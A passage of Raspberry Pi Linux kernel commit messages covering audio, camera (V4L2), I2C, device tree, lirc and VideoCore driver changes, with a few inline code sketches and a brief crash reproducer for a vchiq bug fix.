Unmute amp when ALSA device opened by a client. Mute, with 5 second delay
when ALSA device closed. (Re-opening the device within the 5 second close
window, will cancel mute.)
Revision 4, using gpiod.
Revision 5, clean-up formatting before adding mute code.
- Convert tab plus 4 space formatting to 2x tab
- Remove '// NOT USED' commented code
Revision 6, don't attempt to "one-shot" unmute amp, unless card is
successfully registered.
Signed-off-by: DigitalDreamtime <clive.messer@digitaldreamtime.co.uk>
Signed-off-by: Daniel Matuschek <daniel@matuschek.net>
Add a parameter to turn off SPDIF output if no audio is playing
This patch adds the parameter auto_shutdown_output to the kernel module.
Default behaviour of the module is the same, but when auto_shutdown_output
is set to 1, the SPDIF output will shut down if no stream is playing.
bugfix for 32kHz sample rate, was missing
HiFiBerry Digi: set SPDIF status bits for sample rate
The HiFiBerry Digi driver did not signal the sample rate in the SPDIF status bits.
While this is optional, some DACs and receivers do not accept this signal. This patch
adds the sample rate bits in the SPDIF status block.
This adds a machine driver for the HifiBerry DAC.
It is a sound card that can be stacked onto the Raspberry Pi.
Signed-off-by: Florian Meier <florian.meier@koalo.de>
The Raspberry Pi firmware manages the power-down and reboot
process. To do this it installs a pm_power_off handler, causing
the gpio-poweroff module to abort the probe function.
This patch introduces a "force" DT property that overrides that
behaviour, and also adds a DT overlay to enable and control it.
Note that running in an active-low configuration (DT parameter
"active_low") requires a custom dt-blob.bin and probably won't
allow a reboot without switching off, so an external inversion
of the trigger signal may be preferable.
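In outline, the probe-time check becomes (a sketch; only the property
name "force" is taken from the description above):

  bool force = of_property_read_bool(pdev->dev.of_node, "force");

  /* normally defer to an existing handler (e.g. the firmware's),
   * unless the "force" property says to take over anyway */
  if (pm_power_off != NULL && !force) {
          dev_err(&pdev->dev, "pm_power_off function already registered\n");
          return -EBUSY;
  }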
Provide a __copy_from_user that uses memcpy. On BCM2708, use
optimised memcpy/memmove/memcmp/memset implementations.
arch/arm: Add mmiocpy/set aliases for memcpy/set
See: https://github.com/raspberrypi/linux/issues/1082
copy_from_user: CPU_SW_DOMAIN_PAN compatibility
The downstream copy_from_user acceleration must also play nice with
CONFIG_CPU_SW_DOMAIN_PAN.
See: https://github.com/raspberrypi/linux/issues/1381
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
1-wire: Add support for configuring pin for w1-gpio kernel module
See: https://github.com/raspberrypi/linux/pull/457
Add bitbanging pullups, use them for w1-gpio
Allows parasite power to work, uses module option pullup=1
bcm2708: Ensure 1-wire pullup is disabled by default, and expose as module parameter
Signed-off-by: Alex J Lennon <ajlennon@dynamicdevices.co.uk>
w1-gpio: Add gpiopin module parameter and correctly free up gpio pull-up pin, if set
Signed-off-by: Alex J Lennon <ajlennon@dynamicdevices.co.uk>
w1-gpio: Sort out the pullup/parasitic power tangle
Especially on platforms with a slower CPU but a relatively high
framebuffer fill bandwidth, like current ARM devices, the existing
console monochrome imageblit function used to draw console text is
suboptimal for common pixel depths such as 16bpp and 32bpp. The existing
code is quite general and can deal with several pixel depths. By creating
special case functions for 16bpp and 32bpp, by far the most common pixel
formats used on modern systems, a significant speed-up is attained
which can be readily felt on ARM-based devices like the Raspberry Pi
and the Allwinner platform, but should help any platform using the
fb layer.
The special case functions allow constant folding, eliminating a number
of instructions including divide operations, and allow the use of an
unrolled loop, eliminating instructions with a variable shift size,
reducing source memory access instructions, and eliminating excessive
branching. These unrolled loops also allow much better code optimization
by the C compiler. The code that selects which optimized variant is used
is also simplified, eliminating integer divide instructions.
The speed-up, measured by timing 'cat file.txt' in the console, varies
between 40% and 70%, when testing on the Raspberry Pi and Allwinner
ARM-based platforms, depending on font size and the pixel depth, with
the greater benefit for 32bpp.
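To illustrate the kind of specialization described above (a simplified
sketch, not the actual patch): with the depth fixed at 32bpp, one 8-pixel
font row becomes a fully unrolled loop with constant shifts and masks:

  static inline void blit_row_32bpp(u32 *dst, u8 bits, u32 fg, u32 bg)
  {
          /* each bit of the font bitmap selects foreground or background */
          dst[0] = (bits & 0x80) ? fg : bg;
          dst[1] = (bits & 0x40) ? fg : bg;
          dst[2] = (bits & 0x20) ? fg : bg;
          dst[3] = (bits & 0x10) ? fg : bg;
          dst[4] = (bits & 0x08) ? fg : bg;
          dst[5] = (bits & 0x04) ? fg : bg;
          dst[6] = (bits & 0x02) ? fg : bg;
          dst[7] = (bits & 0x01) ? fg : bg;
  }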
Signed-off-by: Harm Hanemaaijer <fgenfb@yahoo.com>
Based on the patch authored by Ali Gholami Rudi at
https://lkml.org/lkml/2009/7/13/153
Provide an ioctl for userspace applications, but only if this operation
is hardware accelerated (otherwise it does not make any sense).
Signed-off-by: Siarhei Siamashka <siarhei.siamashka@gmail.com>
The "input" trigger makes the associated GPIO an input. This is to support
the Raspberry Pi PWR LED, which is driven by external hardware in normal use.
N.B. pwr_led is not available on Model A or B boards.
leds-gpio: Implement the brightness_get method
The power LED uses some clever logic that means it is driven
by a voltage measuring circuit when configured as input, otherwise
it is driven by the GPIO output value. This patch wires up the
brightness_get method for leds-gpio so that user-space can monitor
the LED value via /sys/class/gpio/led1/brightness. Using the input
trigger this returns an indication of the system power health,
otherwise it is just whatever value the trigger has written most
recently.
See: https://github.com/raspberrypi/linux/issues/1064
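Roughly what wiring up brightness_get amounts to (struct and field names
are assumptions for illustration, not the exact patch):

  static enum led_brightness gpio_led_get(struct led_classdev *led_cdev)
  {
          struct gpio_led_data *led_dat =
                  container_of(led_cdev, struct gpio_led_data, cdev);

          /* report the level currently seen on the GPIO */
          return gpiod_get_value_cansleep(led_dat->gpiod) ? LED_FULL : LED_OFF;
  }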
The EPAPR standard says to use "phandle" properties to store phandles,
rather than the deprecated "linux,phandle" version. By default, dtc
generates both, but adding "-H epapr" causes it to only generate
"phandle"s, saving some space and clutter.
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
Change the filenames and extensions to keep the pre-DDT style of
overlay (<name>-overlay.dtb) distinct from new ones that use a
different style of local fixups (<name>.dtbo), and to match other
platforms.
The RPi firmware uses the DDTK trailer atom to choose which type of
overlay to use for each kernel.
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
Add the bare minimum needed to boot BCM2708 from a Device Tree.
Signed-off-by: Noralf Tronnes <notro@tronnes.org>
BCM2708: DT: change 'axi' nodename to 'soc'
Change DT node named 'axi' to 'soc' so it matches ARCH_BCM2835.
The VC4 bootloader fills in certain properties in the 'axi' subtree,
but since this is part of an upstreaming effort, the name is changed.
Signed-off-by: Noralf Tronnes notro@tronnes.org
BCM2708_DT: Correct length of the peripheral space
Use dts-dirs feature for overlays.
The kernel makefiles have a dts-dirs target that is for vendor subdirectories.
Using this fixes the install_dtbs target, which previously did not install the overlays.
BCM270X_DT: configure I2S DMA channels
Signed-off-by: Matthias Reichl <hias@horus.com>
BCM270X_DT: switch to bcm2835-i2s
I2S soundcard drivers with proper devicetree support (i.e. not linking
to the cpu_dai/platform via name but to cpu/platform via of_node)
will work out of the box without any modifications.
When the kernel is compiled without devicetree support the platform
code will instantiate the bcm2708-i2s driver and I2S soundcard drivers
will link to it via name, as before.
Signed-off-by: Matthias Reichl <hias@horus.com>
SDIO-overlay: add poll_once-boolean parameter
Add parameter to toggle sdio-device polling:
done every second or once at boot-time.
Signed-off-by: Patrick Boettcher <patrick.boettcher@posteo.de>
BCM270X_DT: Make mmc overlay compatible with current firmware
The original DT overlay logic followed a merge-then-patch procedure,
i.e. parameters are applied to the loaded overlay before the overlay
is merged into the base DTB. This sequence has been changed to
patch-then-merge, in order to support parameterised node names, and
to protect against bad overlays. As a result, overrides (parameters)
must only target labels in the overlay, but the overlay can obviously target nodes in the base DTB.
mmc-overlay.dts (that switches back to the original mmc sdcard
driver) is the only overlay violating that rule, and this patch
fixes it.
bcm270x_dt: Use the sdhost MMC controller by default
The "mmc" overlay reverts to using the other controller.
squash: Add cprman to dt
BCM270X_DT: Use clk_core for I2C interfaces
Includes the new localfixups format.
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
scripts/dtc: Fix UMR causing corrupt dtbo overlay files
struct fixup_entry is allocated from the heap but it's member
local_fixup_generated was never initialized. This lead to
corrupted dtbo files.
Fix this by initializing local_fixup_generated to false.
Signed-off-by: Matthias Reichl <hias@horus.com>
scripts/dtc: Only emit local fixups for overlays
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
The Raspberry Pi firmware looks for a trailer on the kernel image to
determine whether it was compiled with Device Tree support enabled.
If the firmware finds a kernel without this trailer, or which has a
trailer indicating that it isn't DT-capable, it disables DT support
and reverts to using ATAGs.
The mkknlimg utility adds that trailer, having first analysed the
image to look for signs of DT support and the kernel version string.
knlinfo displays the contents of the trailer in the given kernel image.
scripts/mkknlimg: Add support for ARCH_BCM2835
Add a new trailer field indicating whether this is an ARCH_BCM2835
build, as opposed to MACH_BCM2708/9. If the loader finds this flag
is set it changes the default base dtb file name from bcm270x...
to bcm283y...
Also update knlinfo to show the status of the field.
scripts/mkknlimg: Improve ARCH_BCM2835 detection
The board support code contains sufficient strings to be able to
distinguish 2708 vs. 2835 builds, so remove the check for
bcm2835-pm-wdt which could exist in either.
Also, since the canned configuration is no longer built in (it's
a module), remove the config string checking.
See: https://github.com/raspberrypi/linux/issues/1157
scripts: Multi-platform support for mkknlimg and knlinfo
The firmware uses tags in the kernel trailer to choose which dtb file
to load. Current firmware loads bcm2835-*.dtb if the '283x' tag is true,
otherwise it loads bcm270*.dtb. This scheme breaks if an image supports
multiple platforms.
This patch adds '270X' and '283X' tags to indicate support for RPi and
upstream platforms, respectively. '283x' (note lower case 'x') is left
for old firmware, and is only set if the image only supports upstream
builds.
scripts/mkknlimg: Append a trailer for all input
Now that the firmware assumes an unsigned kernel is DT-capable, it is
helpful to be able to mark a kernel as being non-DT-capable.
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
scripts/knlinfo: Decode DDTK atom
Show the DDTK atom as being a boolean.
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
- Supports raw YUV capture, preview, JPEG and H264.
- Uses videobuf2 for data transfer, using dma_buf.
- Uses 3.6.10 timestamping
- Camera power based on use
- Uses immutable input mode on video encoder
Signed-off-by: Daniel Stone <daniels@collabora.com>
Signed-off-by: Luke Diamand <luked@broadcom.com>
V4L2: Fixes from 6by9
V4L2: Fix EV values. Add manual shutter speed control
V4L2 EV values should be in units of 1/1000. Corrected.
Add support for V4L2_CID_EXPOSURE_ABSOLUTE which should
give manual shutter control. Requires manual exposure mode
to be selected first.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Correct JPEG Q-factor range
Should be 1-100, not 0-100
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Fix issue of driver jamming if STREAMON failed.
Fix issue where the driver was left in a partially enabled
state if STREAMON failed, and would then reject many IOCTLs
as it thought it was streaming.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Fix ISO controls.
Driver was passing the index to the GPU, and not the desired
ISO value.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Add flicker avoidance controls
Add support for V4L2_CID_POWER_LINE_FREQUENCY to set flicker
avoidance frequencies.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Add support for frame rate control.
Add support for frame rate (or time per frame as V4L2
inverts it) control via s_parm.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Improve G_FBUF handling so we pass conformance
Return some sane numbers for get framebuffer so that
we pass conformance.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Fix information advertised through g_vidfmt
Width and height were being stored based on incorrect
values.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Add support for inline H264 headers
Add support for V4L2_CID_MPEG_VIDEO_REPEAT_SEQ_HEADER
to control H264 inline headers.
Requires firmware fix to work correctly, otherwise format
has to be set to H264 before this parameter is set.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Fix JPEG timestamp issue
JPEG images were coming through from the GPU with timestamp
of 0. Detect this and give current system time instead
of some invalid value.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Fix issue when switching down JPEG resolution.
JPEG buffer size calculation is based on input resolution.
Input resolution was being configured after output port
format. Caused failures if switching from one JPEG resolution
to a smaller one.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Enable MJPEG encoding
Requires GPU firmware update to support MJPEG encoder.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Correct flag settings for compressed formats
Set flags field correctly on enum_fmt_vid_cap for compressed
image formats.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: H264 profile & level ctrls, FPS control and auto exp pri
Several control handling updates.
H264 profile and level controls.
Timeperframe/FPS reworked to add V4L2_CID_EXPOSURE_AUTO_PRIORITY to
select whether AE is allowed to override the framerate specified.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Correct BGR24 to RGB24 in format table
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Add additional pixel formats. Correct colourspace
Adds the other flavours of YUYV, and NV12.
Corrects the overlay advertised colourspace.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Drop logging msg from info to debug
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Initial pass at scene modes.
Only supports exposure mode and metering modes.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Add manual white balance control.
Adds support for V4L2_CID_RED_BALANCE and
V4L2_CID_BLUE_BALANCE. Only has an effect if
V4L2_CID_AUTO_N_PRESET_WHITE_BALANCE has
V4L2_WHITE_BALANCE_MANUAL selected.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
config: Enable V4L / MMAL driver
V4L2: Increase the MMAL timeout to 3sec
MJPEG codec flush is now taking longer and results
in a kernel panic if the driver has stopped waiting for
the result when it finally completes.
Increase the timeout value from 1 to 3secs.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Add support for setting H264_I_PERIOD
Adds support for the parameter V4L2_CID_MPEG_VIDEO_H264_I_PERIOD
to set the frequency with which I frames are produced.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Enable GPU function for removing padding from images.
GPU can now support arbitrary strides, although may require
additional processing to achieve it. Enable this feature
so that the images delivered are the size requested.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Add support for V4L2_PIX_FMT_BGR32
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Set the colourspace to avoid odd YUV-RGB conversions
Removes the ambiguity from the conversion routines and stops
them dropping back to the SD vs HD choice of coeffs.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Make video/still threshold a run-time param
Move the define for at what resolution the driver
switches from a video mode capture to a stills mode
capture to module parameters.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Fix incorrect pool sizing
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Add option to disable enum_framesizes.
Gstreamer's handling of a driver that advertises
V4L2_FRMSIZE_TYPE_STEPWISE to define the supported
resolutions is broken. See bug
https://bugzilla.gnome.org/show_bug.cgi?id=726521
Optional parameter of gst_v4l2src_is_broken added.
If non-zero, the driver claims not to support that
ioctl, and gstreamer should be happy again (it
guesses a set of defaults for itself).
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Add support for more image formats
Adds YVU420 (YV12), YVU420SP (NV21), and BGR888.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
V4L2: Extend range for V4L2_CID_MPEG_VIDEO_H264_I_PERIOD
Request to extend the range from the fairly arbitrary
1000 frames (33 seconds at 30fps). Extend out to the
max range supported (int32 value).
Also allow 0, which is handled by the codec as only
send an I-frame on the first frame and never again.
There may be an exception if it detects a significant
scene change, but there's no easy way around that.
Signed-off-by: Dave Stevenson <dsteve@broadcom.com>
bcm2835-camera: stop_streaming now has a void return
BCM2835-V4L2: Fix compliance test failures
VIDIOC_TRY_FMT and VIDIOC_S_FMT tests were failing due
to reporting V4L2_COLORSPACE_JPEG when the colour
format wasn't V4L2_PIX_FMT_JPEG.
Now reports V4L2_COLORSPACE_SMPTE170M for YUV formats.
bcm2835 camera planar/packed stride length
Added a field to the mmal_fmt struct used to compute the bytes per line
when using a particular format. This results in the correct stride being
calculated even when the format is planar.
Signed-off-by: Garrett Wilson <g@floft.net>
bcm2835: camera: check for scene not being found
static analysis by cppcheck detected some potential NULL pointer
dereference issues:
[drivers/media/platform/bcm2835/controls.c:854]: (error) Possible null
pointer dereference: scene
(and lines 858, 859 too)
it is possible that scene is not found because of an invalid ctrl->val
and is therefore NULL, hence causing a null pointer dereference.
Signed-off-by: Colin Ian King <colin.king@canonical.com>
bcm2835: memcpy port data to m rather than rmsg
static analysis by cppcheck detected a memcpy to rmsg which is
not actually initialized at that point. The memcpy should be copying
to variable m instead.
Signed-off-by: Colin Ian King <colin.king@canonical.com>
BCM2835-V4L2: Return buffers to videobuf2 on shutdown
https://github.com/raspberrypi/linux/issues/817
Fixes the kernel warning from videobuf2 as buffers
are now returned as they are being flushed on
stop_streaming.
squash: Fixup bcm2835-camera for changes in kernel 4.4 api
v4l2: Fix up driver to upstream timestamp changes
bcm2835-camera: fix a bug in computation of frame timestamp
Fixes #1318
V4L2 driver updates (#1393)
* BCM2835-V4L2: Correct ISO control and add V4L2_CID_ISO_SENSITIVITY_AUTO
https://github.com/raspberrypi/linux/issues/1251
V4L2_CID_ISO_SENSITIVITY was not advertising ISO*1000 as it should.
V4L2_CID_ISO_SENSITIVITY_AUTO was not implemented, so was taking
V4L2_CID_ISO_SENSITIVITY as 0 for auto mode.
Still accepts 0 for auto, but also abides by the new parameter.
Signed-off-by: Dave Stevenson <6by9@users.noreply.github.com>
* BCM2835-V4L2: Add a video_nr parameter.
Adds a kernel parameter "video_nr" to specify the preferred
/dev/videoX device node.
https://www.raspberrypi.org/forums/viewtopic.php?f=38&t=136120&p=905545
Signed-off-by: Dave Stevenson <6by9@users.noreply.github.com>
* BCM2835-V4L2: Add support for multiple cameras
Ask GPU on load how many cameras have been detected, and
enumerate that number of devices.
Only applicable on the Compute Module as no other device
exposes multiple CSI2 interfaces.
Signed-off-by: Dave Stevenson <6by9@users.noreply.github.com>
* BCM2835-V4L2: Add control of the overlay location and alpha.
Actually do something useful in vidioc_s_fmt_vid_overlay and
vidioc_try_fmt_vid_overlay, rather than effectively having
read-only fields.
Signed-off-by: Dave Stevenson <6by9@users.noreply.github.com>
* BCM2835-V4L2: V4L2-Compliance failure fix
VIDIOC_TRY_FMT was failing due to bytesperline not
being set correctly by default.
Signed-off-by: Dave Stevenson <6by9@users.noreply.github.com>
* BCM2835-V4L2: Make all module parameters static
Clean up to correct variable scope
Signed-off-by: Dave Stevenson <6by9@users.noreply.github.com>
V4L2: Request maximum resolution from GPU
Get resolution information about the sensors from the GPU
and advertise it correctly.
Signed-off-by: Dave Stevenson <6by9@users.noreply.github.com>
BCM2835-V4L2: Increase minimum resolution to 32x32
https://github.com/raspberrypi/linux/issues/1498 showed
that 16x16 fails to work on the GPU for some reason.
GPU bug being tracked on
https://github.com/raspberrypi/firmware/issues/607
Workaround here by increasing minimum resolution via V4L2
to 32x32.
Signed-off-by: Dave Stevenson <6by9@users.noreply.github.com>
[media]: bcm2835-camera: fix compilation error
There is an error when compiling rpi-4.6.y branch:
CC [M] drivers/media/platform/bcm2835/bcm2835-camera.o
drivers/media/platform/bcm2835/bcm2835-camera.c:639:17: error: initialization from incompatible pointer type [-Werror=incompatible-pointer-types]
.queue_setup = queue_setup,
^
drivers/media/platform/bcm2835/bcm2835-camera.c:639:17: note: (near initialization for 'bm2835_mmal_video_qops.queue_setup')
The const void *parg in setup_queue callback is not needed since commit:
df9ecb0cad.
This commit removes it.
Signed-off-by: Slawomir Stepien <sst@poczta.fm>
bcm2835-camera: Fix max/min error when looping over cameras/resolutions
See: https://github.com/raspberrypi/linux/issues/1447#issuecomment-221303506
BCM2835-V4L2: Correct handling for BGR24 vs RGB24.
There was a bug in the GPU firmware that had reversed these
two formats.
Detect the old firmware, and reverse the formats if necessary.
Signed-off-by: Dave Stevenson <6by9@users.noreply.github.com>
Support booting without Device Tree.
Turn on USB power.
Load driver early because of lacking support for deferred probing
in many drivers.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
Add module for accessing the mailbox property channel through
/dev/vcio. Was previously in bcm2708-vcio.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
i2c-bcm2708: fixed baudrate
Fixed issue where the wrong CDIV value was set for baudrates below 3815 Hz (for 250MHz bus clock).
In that case the computed CDIV value was more than 0xffff. However the CDIV register width is only 16 bits.
This resulted in incorrect setting of CDIV and higher baudrate than intended.
Example: 3500Hz -> CDIV=0x11704 -> CDIV(16bit)=0x1704 -> 42430Hz
After correction: 3500Hz -> CDIV=0x11704 -> CDIV(16bit)=0xffff -> 3815Hz
The correct baudrate is shown in the log after the cdiv > 0xffff correction.
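In other words (a sketch of the corrected calculation):

  u32 cdiv = bus_hz / baudrate;   /* 250 MHz / 3500 Hz = 0x11704 */
  if (cdiv > 0xffff)
          cdiv = 0xffff;          /* the CDIV register is only 16 bits wide */
  /* actual baudrate = bus_hz / cdiv, e.g. 250 MHz / 0xffff ≈ 3815 Hz */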
Perform I2C combined transactions when possible
Perform I2C combined transactions whenever possible, within the
restrictions of the Broadcom Serial Controller.
Disable DONE interrupt during TA poll
Prevent interrupt from being triggered if poll is missed and transfer
starts and finishes.
i2c: Make combined transactions optional and disabled by default
i2c: bcm2708: add device tree support
Add DT support to driver and add to .dtsi file.
Setup pins in .dts file.
i2c is disabled by default.
Signed-off-by: Noralf Tronnes <notro@tronnes.org>
bcm2708: don't register i2c controllers when using DT
The devices for the i2c controllers are in the Device Tree.
Only register devices when not using DT.
Signed-off-by: Noralf Tronnes <notro@tronnes.org>
I2C: Only register the I2C device for the current board revision
i2c_bcm2708: Fix clock reference counting
Fix grabbing lock from atomic context in i2c driver
2 main changes:
- check for timeouts in the bcm2708_bsc_setup function as indicated by this comment:
/* poll for transfer start bit (should only take 1-20 polls) */
This implies that the setup function can now fail so account for this everywhere it's called
- Removed the clk_get_rate call from inside the setup function as it locks a mutex and that's not ok since we call it from under a spin lock.
i2c-bcm2708: When using DT, leave the GPIO setup to pinctrl
i2c-bcm2708: Increase timeouts to allow larger transfers
Use the timeout value provided by the I2C_TIMEOUT ioctl when waiting
for completion. The default timeout is 1 second.
See: https://github.com/raspberrypi/linux/issues/260
i2c-bcm2708/BCM270X_DT: Add support for I2C2
The third I2C bus (I2C2) is normally reserved for HDMI use. Careless
use of this bus can break an attached display - use with caution.
It is recommended to disable accesses by VideoCore by setting
hdmi_ignore_edid=1 or hdmi_edid_file=1 in config.txt.
The interface is disabled by default - enable using the
i2c2_iknowwhatimdoing DT parameter.
bcm2708-spi: Don't use static pin configuration with DT
Also remove superfluous error checking - the SPI framework ensures the
validity of the chip_select value.
i2c-bcm2708: Remove non-DT support
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
Set the BSC_CLKT clock stretching timeout to 35ms as per SMBus specs.
Fixes i2c_bcm2708: Write to FIFO correctly - v2 (#1574)
* i2c: fix i2c_bcm2708: Clear FIFO before sending data
Make sure FIFO gets cleared before trying to send
data in case of a repeated start (COMBINED=Y).
* i2c: fix i2c_bcm2708: Only write to FIFO when not full
Check if FIFO can accept data before writing.
To avoid a peripheral read on the last iteration of a loop,
both bcm2708_bsc_fifo_fill and ~drain are changed as well.
BCM270x: Move thermal sensor to Device Tree
Add Device Tree support to bcm2835-thermal driver.
Add thermal sensor device to Device Tree.
Don't add platform device when booting in DT mode.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
lirc_rpi: Use read_current_timer to determine transmitter delay. Thanks to jjmz and others
See: https://github.com/raspberrypi/linux/issues/525
lirc: Remove restriction on gpio pins that can be used with lirc
The Compute Module, for example, could use different pins.
lirc_rpi: Add parameter to specify input pin pull
Depending on the connected IR circuitry it might be desirable to change the
GPIO's internal pull from its default pull-down behaviour. Add a module
parameter to allow the user to set it explicitly.
Signed-off-by: Julian Scheel <julian@jusst.de>
lirc-rpi: Use the higher-level irq control functions
This module used to access the irq_chip methods of the
gpio controller directly, rather than going through the
standard enable_irq/irq_set_irq_type functions. This
caused problems on pinctrl-bcm2835 which only implements
the irq_enable/disable methods and not irq_unmask/mask.
lirc-rpi: Correct the interrupt usage
1) Correct the use of enable_irq (i.e. don't call it so often)
2) Correct the shutdown sequence.
3) Avoid a bcm2708_gpio driver quirk by setting the irq flags earlier
lirc-rpi: use getnstimeofday instead of read_current_timer
read_current_timer isn't guaranteed to return values in
microseconds, and indeed it doesn't on a Pi2.
Issue: linux#827
lirc-rpi: Add device tree support, and a suitable overlay
The overlay supports DT parameters that match the old module
parameters, except that gpio_in_pull should be set using the
strings "up", "down" or "off".
lirc-rpi: Also support pinctrl-bcm2835 in non-DT mode
fix auto-sense in lirc_rpi driver
On a Raspberry Pi 2, the lirc_rpi driver might receive spurious
interrupts and change its low-active / high-active setting.
When this happens, the IR remote control stops working.
This patch disables this auto-detection if the 'sense' parameter
was set in the device tree, making the driver robust to such
spurious interrupts.
Use the clock manager instead of a self-made clock manager.
Also fix some error paths that showed up during development
(especially a missing release of DMA resources on rmmod).
Signed-off-by: Martin Sperl <kernel@martin.sperl.org>
Add experimental support for the VideoCore shared memory service.
This allows user processes to allocate memory from VideoCore's
GPU relocatable heap and mmap the buffers. Additionally, the memory
handles can be passed to other VideoCore services such as MMAL, OpenMax
and DispmanX.
TODO
* This driver was originally released for BCM28155 which has a different
cache architecture to BCM2835. Consequently, in this release only
uncached mappings are supported. However, there's no fundamental
reason why cached mappings cannot be supported on BCM2835.
* More refactoring is required to remove the typedefs.
* Re-enable some of the commented-out debugfs statistics which were
disabled when migrating code from procfs.
* There's a lot of code to support sharing of VCSM in order to support
Android. This could probably be done more cleanly or perhaps just
removed.
Signed-off-by: Tim Gover <timgover@gmail.com>
config: Disable VC_SM for now to fix hang with cutdown kernel
vcsm: Use boolean as it cannot be built as module
On building the bcm_vc_sm as a module we get the following error:
v7_dma_flush_range and do_munmap are undefined in vc-sm.ko.
Fix by making it not an option to build as module
vcsm: Add ioctl for custom cache flushing
vc-sm: Move headers out of arch directory
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
Signed-off-by: popcornmix <popcornmix@gmail.com>
BCM270x: Move vc_mem
Make the vc_mem module available for ARCH_BCM2835 by moving it.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
Signed-off-by: popcornmix <popcornmix@gmail.com>
vchiq: create_pagelist copes with vmalloc memory
Signed-off-by: Daniel Stone <daniels@collabora.com>
vchiq: fix the shim message release
Signed-off-by: Daniel Stone <daniels@collabora.com>
vchiq: export additional symbols
Signed-off-by: Daniel Stone <daniels@collabora.com>
VCHIQ: Make service closure fully synchronous (drv)
This is one half of a two-part patch, the other half of which is to
the vchiq_lib user library. With these patches, calls to
vchiq_close_service and vchiq_remove_service won't return until any
associated callbacks have been delivered to the callback thread.
VCHIQ: Add per-service tracing
The new service option VCHIQ_SERVICE_OPTION_TRACE is a boolean that
toggles tracing for the specified service.
This commit also introduces vchi_service_set_option and the associated
option VCHI_SERVICE_OPTION_TRACE.
vchiq: Make the synchronous-CLOSE logic more tolerant
vchiq: Move logging control into debugfs
vchiq: Take care of a corner case tickled by VCSM
Closing a connection that isn't fully open requires care, since one
side does not know the other side's port number. Code was present to
handle the case where a CLOSE is sent immediately after an OPEN, i.e.
before the OPENACK has been received, but this was incorrectly being
used when an OPEN from a client using port 0 was rejected.
(In the observed failure, the host was attempting to use the VCSM
service, which isn't present in the 'cutdown' firmware. The failure
was intermittent because sometimes the keepalive service would
grab port 0.)
This case can be distinguished because the client's remoteport will
still be VCHIQ_PORT_FREE, and the srvstate will be OPENING. Either
condition is sufficient to differentiate it from the special case
described above.
vchiq: Avoid high load when blocked and unkillable
vchiq: Include SIGSTOP and SIGCONT in list of signals not-masked by vchiq to allow gdb to work
vchiq_arm: Complete support for SYNCHRONOUS mode
vchiq: Remove inline from suspend/resume
vchiq: Allocation does not need to be atomic
vchiq: Fix wrong condition check
The log level is checked from within the log call. Remove the check in the call.
Signed-off-by: Pranith Kumar <bobby.prani@gmail.com>
BCM270x: Add vchiq device to platform file and Device Tree
Prepare to turn the vchiq module into a driver.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
bcm2708: vchiq: Add Device Tree support
Turn vchiq into a driver and stop hardcoding resources.
Use devm_* functions in probe path to simplify cleanup.
A global variable is used to hold the register address. This is done
to keep this patch as small as possible.
Also make available on ARCH_BCM2835.
Based on work by Lubomir Rintel.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
vchiq: Change logging level for inbound data
vchiq_arm: Two cacheing fixes
1) Make fragment size vary with cache line size
Without this patch, non-cache-line-aligned transfers may corrupt
(or be corrupted by) adjacent data structures.
Both ARM and VC need to be updated to enable this feature. This is
ensured by having the loader apply a new DT parameter -
cache-line-size. The existence of this parameter guarantees that the
kernel is capable, and the parameter will only be modified from the
safe default if the loader is capable.
2) Flush/invalidate vmalloc'd memory, and invalidate after reads
vchiq: fix NULL pointer dereference when closing driver
The following code run as root will cause a null pointer dereference oops:
int fd = open("/dev/vc-cma", O_RDONLY);
if (fd < 0)
err(1, "open failed");
(void)close(fd);
[ 1704.877721] Unable to handle kernel NULL pointer dereference at virtual address 00000000
[ 1704.877725] pgd = b899c000
[ 1704.877736] [00000000] *pgd=37fab831, *pte=00000000, *ppte=00000000
[ 1704.877748] Internal error: Oops: 817 [#1] PREEMPT SMP ARM
[ 1704.877765] Modules linked in: evdev i2c_bcm2708 uio_pdrv_genirq uio
